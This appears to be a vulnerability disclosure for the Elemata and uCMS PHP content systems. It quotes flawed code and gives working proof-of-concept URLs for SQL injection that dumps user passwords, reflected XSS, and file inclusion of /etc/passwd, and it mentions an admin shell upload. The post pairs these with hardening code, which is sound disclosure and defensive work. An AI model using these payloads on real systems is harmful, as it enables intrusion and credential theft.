Elemata CMS
Developer's site
Download
SQL-injection
Dependencies: magic_quotes_gpc = off
File: /functions/global.php
PHP code:
```php
...
function e_meta($id)
{
...
$query_meta = "SELECT * FROM posts WHERE id = '$id'";
$meta = mysql_query($query_meta, $default) or die(mysql_error());
$row_meta = mysql_fetch_assoc($meta);
echo '
';
...
}
```
PoC:
http://127.0.0.1/e/index.php?id=1'+and+1=0+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+--+
Reflected XSS
File: /themes/revive/search.php
PHP code:
```php
...
You searched for ""
...
```
PoC:
http://127.0.0.1/e/index.php?s=alert('lol');
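The fix for the search template is output encoding. The following is an added example, not code from Elemata CMS: it wraps the search term in `htmlspecialchars()` before it is reflected into the page, so the payload in the PoC above is rendered as literal text instead of executed. The `html_escape()` helper and the sample term are assumptions introduced here.

```php
<?php
// Added example (not Elemata's own code): escape the search term before
// reflecting it into HTML. /themes/revive/search.php echoes $_GET['s'] raw,
// which is what the PoC above abuses.

// Return a value that is safe to place in HTML text or attribute context.
// ENT_QUOTES also encodes ' and ", so the result is safe inside quoted
// attribute values; ENT_SUBSTITUTE keeps invalid UTF-8 from yielding an
// empty string, and the explicit charset avoids encoding ambiguities.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The search term; the fallback is a constructed sample for running this offline.
$term = $_GET['s'] ?? 'example <script>alert(1)</script>';

// Hardened form of the vulnerable template line:
echo 'You searched for "' . html_escape($term) . '"';
// The browser displays the tags literally; no script runs.
```

Encoding must happen at the point of output and match the context (HTML text here); escaping on input, which `magic_quotes_gpc` was meant to approximate, does not cover HTML and is not a substitute.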
Shell upload
Dependencies: administrator rights
In the admin panel, under the Media section.
LFI
Dependencies: magic_quotes_gpc = off, and administrator rights
File: /admin/content/themes.php
PHP code:
```php
...
if($_REQUEST['cmd'] == activate)
{
//UPDATE THEME SETTINGS
$a_folder = $_REQUEST['folder'];
mysql_select_db($database_default, $default);
mysql_query("UPDATE settings SET theme = '$a_folder'");
}
...
```
File: /index.php
PHP code:
```php
...
//Include Theme
mysql_select_db($database_default, $default);
$theme = mysql_query("SELECT * FROM settings");
$row_theme = mysql_fetch_assoc($theme);
include ("themes/".$row_theme['theme']."/index.php");
...
```
PoC:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=../../../../../../../etc/passwd%00
Open the front page and the file is included. Switch the theme back to the default one:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=revive
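The root cause is that `themes.php` stores whatever `folder` it receives and `index.php` includes it unchecked. The following is an added example, not Elemata's code: the requested name is restricted to a single safe path segment, resolved with `realpath()` and required to be an existing theme under `themes/`, and the include side re-validates the stored value so a tampered settings row cannot reach `include()` either. `THEMES_DIR`, `validate_theme_folder()`, `activate_theme()`, `theme_entry_point()` and the mysqli `$db` connection are assumptions; table and column names are those in the post.

```php
<?php
// Added example, not Elemata's own code. Hardens the "activate" branch of
// /admin/content/themes.php and the include in /index.php.

const THEMES_DIR = __DIR__ . '/themes'; // assumed layout: themes/<name>/index.php

// Return the validated theme name, or null if the request is not acceptable.
function validate_theme_folder(string $requested): ?string
{
    // One path segment of safe characters: no "/", "\", "." or NUL bytes,
    // so both "../" traversal and a trailing %00 are rejected up front.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }
    // Must resolve to a directory inside THEMES_DIR that has an index.php.
    $base      = realpath(THEMES_DIR);
    $candidate = realpath(THEMES_DIR . '/' . $requested);
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the themes directory
    }
    if (!is_file($candidate . '/index.php')) {
        return null;
    }
    return $requested;
}

// Admin side: store the theme name only after validation, via a bound parameter.
function activate_theme(mysqli $db, string $requested): bool
{
    $folder = validate_theme_folder($requested);
    if ($folder === null) {
        http_response_code(400);
        return false;
    }
    $stmt = $db->prepare('UPDATE settings SET theme = ?');
    $stmt->bind_param('s', $folder);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Front-end side (/index.php): re-check the stored value before include(),
// so a value written by any other path is still confined to themes/.
function theme_entry_point(string $stored): ?string
{
    $folder = validate_theme_folder($stored);
    return $folder === null ? null : THEMES_DIR . '/' . $folder . '/index.php';
}

// Usage, assuming $db and the admin session check already exist:
// if (($_REQUEST['cmd'] ?? '') === 'activate') {
//     activate_theme($db, (string) ($_REQUEST['folder'] ?? ''));
// }
// and in /index.php:
// $entry = theme_entry_point($row_theme['theme']);
// if ($entry !== null) { include $entry; }
```

Validating on both the write and the read path is deliberate: the admin form is only one way the `settings.theme` value can change, and the include is where the damage happens.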
uCMS v 1.2
Developer's site
Download
SQL injection
Dependencies: magic_quotes_gpc = off
File: /content.php
PHP code:
```php
...
$current_page = mysql_query("SELECT * FROM ".$db_prefix."pages WHERE id = '$_GET[id_page]' Limit 1");
$r_current_page = mysql_fetch_array($current_page);
$current_version_page = mysql_query("SELECT * FROM ".$db_prefix."pages_lg WHERE id_page = '$r_current_page[id]' AND id_lg = '$r_current_language[id]' Limit 1");
$r_current_version_page = mysql_fetch_array($current_version_page);
...
if(settings_site_name_display == 1)
{
include('modules/sitename/sitename.php');
if(settings_site_name_position == 1) $page_title = $mod_sitename_site_name.($r_current_version_page['title'] ? ' - ' : '').$r_current_version_page['title'];
elseif(settings_site_name_position == 2) $page_title = $r_current_version_page['title'].($r_current_version_page['title'] ? ' - ' : '').$mod_sitename_site_name;
}
else
$page_title = $r_current_version_page['title'];
...
```
Data from the first query ends up in the second, and the $page_title variable is then output. PoC:
Code:
-1' union select 1,2,3,4,version(),6,7,8,9,10,11,12 -- d ==>
0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064
http://127.0.0.1/cms/index.php?id_page=-1'+union+select+0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064,2,3,4,5,6,7,8+--+
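Both injections in this post, Elemata's `e_meta()` in `/functions/global.php` and the two chained queries in uCMS's `/content.php`, have the same fix: send values as bound parameters instead of building SQL strings. The following is an added example, not code from either project. It uses mysqli prepared statements; the uCMS part binds the id returned by the first query into the second one as well, because that value is attacker-influenced (the PoC above plants the second payload through the first query). `$db`, the `e_meta()` and `current_page_version()` signatures and the `$id_lg` argument are assumptions; table and column names are those shown in the post.

```php
<?php
// Added example, not the CMS authors' code. Requires the mysqli extension
// with mysqlnd (for get_result()).

// Elemata: look up one post by id. Anything that is not a plain integer is
// refused, and the bound parameter is never parsed as SQL.
function e_meta(mysqli $db, $id): ?array
{
    if (!ctype_digit((string) $id)) {
        return null;
    }
    $id = (int) $id;
    $stmt = $db->prepare('SELECT * FROM posts WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// uCMS: two dependent queries. The id that comes back from the first query
// is treated as untrusted data too, so it is bound, not concatenated; that
// closes the second-order path even if the pages table already holds a
// crafted id.
function current_page_version(mysqli $db, string $db_prefix, string $id_page, int $id_lg): ?array
{
    // Table names cannot be bound, so the prefix (from config) must be a
    // plain identifier before it is interpolated.
    if (!preg_match('/\A[A-Za-z0-9_]*\z/', $db_prefix)) {
        throw new InvalidArgumentException('bad db prefix');
    }
    $pages    = $db_prefix . 'pages';
    $pages_lg = $db_prefix . 'pages_lg';

    $stmt = $db->prepare("SELECT * FROM `$pages` WHERE id = ? LIMIT 1");
    $stmt->bind_param('s', $id_page);
    $stmt->execute();
    $page = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($page === null) {
        return null;
    }

    $stmt = $db->prepare("SELECT * FROM `$pages_lg` WHERE id_page = ? AND id_lg = ? LIMIT 1");
    $stmt->bind_param('si', $page['id'], $id_lg);
    $stmt->execute();
    $version = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $version ?: null;
}

// Usage in /content.php, assuming $db, $db_prefix and $r_current_language exist:
// $r_current_version_page = current_page_version(
//     $db, $db_prefix, (string) ($_GET['id_page'] ?? ''), (int) $r_current_language['id']
// );
```

Note that `magic_quotes_gpc` would not have protected the second query even when on: it escapes request input, not values read back from the database. The `title` that becomes `$page_title` is still user-controlled content and needs `htmlspecialchars()` at output, as for the reflected XSS above.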